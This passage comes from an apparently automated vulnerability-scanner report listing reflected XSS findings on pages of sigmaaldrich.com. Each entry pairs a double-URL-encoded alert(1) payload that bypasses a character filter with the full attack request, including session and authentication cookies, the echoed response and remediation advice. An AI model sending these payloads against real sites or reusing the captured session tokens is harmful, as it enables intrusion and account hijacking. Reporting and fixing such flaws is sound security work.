This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma/General_Information99216%2522%253balert%25281%2529%252f%252fecff0d357a1/featured_products.Par.0001.File.tmp/featured_products.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:47 GMT
Content-Length: 29005
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma/General_Information99216";alert(1)//ecff0d357a1/featured_products.Par.0001.File.tmp/featured_products.pdf","E404") ;
   </script>
...[SNIP]...

1.314. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d6f2%2522%253balert%25281%2529%252f%252ff32e0b56c1f was submitted in the REST URL parameter 6. This input was echoed as 6d6f2";alert(1)//f32e0b56c1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma/General_Information/6d6f2%2522%253balert%25281%2529%252f%252ff32e0b56c1f/featured_products.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:49 GMT
Content-Length: 28970
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma/General_Information/6d6f2";alert(1)//f32e0b56c1f/featured_products.pdf","E404") ;
   </script>
...[SNIP]...

1.315. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15526%2522%253balert%25281%2529%252f%252fde752927cc0 was submitted in the REST URL parameter 1. This input was echoed as 15526";alert(1)//de752927cc0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc15526%2522%253balert%25281%2529%252f%252fde752927cc0/medialib/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:52 GMT
Content-Length: 28991
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc15526";alert(1)//de752927cc0/medialib/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.316. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83654%2522%253balert%25281%2529%252f%252ffa18e8c1991 was submitted in the REST URL parameter 2. This input was echoed as 83654";alert(1)//fa18e8c1991 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib83654%2522%253balert%25281%2529%252f%252ffa18e8c1991/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:59 GMT
Content-Length: 28991
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib83654";alert(1)//fa18e8c1991/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.317. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9c94%2522%253balert%25281%2529%252f%252f2fbdb9aee17 was submitted in the REST URL parameter 3. This input was echoed as f9c94";alert(1)//2fbdb9aee17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docsf9c94%2522%253balert%25281%2529%252f%252f2fbdb9aee17/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:05 GMT
Content-Length: 28991
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docsf9c94";alert(1)//2fbdb9aee17/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.318. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f05b%2522%253balert%25281%2529%252f%252f3afd928ea16 was submitted in the REST URL parameter 4. This input was echoed as 8f05b";alert(1)//3afd928ea16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

